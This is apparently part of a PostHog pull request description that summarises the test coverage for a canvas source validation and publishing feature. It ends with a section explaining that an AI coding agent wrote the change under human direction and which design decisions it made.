- `posthog/api/file_system/test/test_canvas_source.py` (20 tests, no DB) — adapter contract: the synthetic project of a legacy canvas validates and round-trips to identical code (guards the read→edit→publish loop rejecting its own output); parameterized error diagnostics for traversal/absolute/backslash paths, extra files, missing component, unadmitted or drifted dependencies, non-whitelisted imports, dynamic import/require/script, and size limits; network calls warn without blocking (a comment mentioning `fetch(` must not brick a canvas).
- `posthog/api/file_system/test/test_canvas_source_api.py` (11 tests) — the full generic-task loop (create → read source → validate → guarded publish → guarded edit), stale-base 409 leaving the canvas untouched, invalid-project 400 publishing nothing, cross-team and cross-channel list scoping (IDOR guard), legacy PATCH ↔ new source tools interop on one version history, first-publish task-thread announcement parity, and non-UUID channel ids mapping to 400/404 instead of a 500 (red/green: reproduced the 500 first).
- `posthog/api/file_system/test/test_canvas_publish.py` (19 existing tests) — unchanged and green, proving the publish refactor preserved legacy behavior.
- `mypy --cache-fine-grained .` repo-wide: no issues. `ruff` clean. `hogli lint:skills` clean. MCP schema snapshot + generate-tools suites green (92 tests). `hogli build:openapi-schema --fail-on-warn` passes (one new `ENUM_NAME_OVERRIDES` entry pins the shared error/warning severity enum).

## Automatic notifications

- [ ] Publish to changelog?
- [ ] Alert Sales and Marketing teams?

## Docs update

## 🤖 Agent context

**Autonomy:** Human-driven (agent-assisted)

Authored by Claude (PostHog Code cloud task) from the plan in PostHog/code#3823, directed by @k11kirky. Skills invoked: /improving-drf-endpoints, /writing-tests, /writing-skills. Decisions worth knowing: phase 1 deliberately adds no models (the plan's source-version/build tables arrive with the cloud build service in phase 3), so guarded publishing reuses the existing `meta.versions` history via a shared transactional helper; `canvas_validate` is a POST but sits in the read-scope bucket because it is side-effect free; the severity enum collision with marketing analytics' UTM issues was resolved by pinning a shared `DiagnosticSeverityEnum` (both use error/warning), which renames that generated type — no non-generated consumers exist. The plan's "generic cloud task publishes via skills" integration test needs the sandbox eval harness and is left for the phase-2 PR.
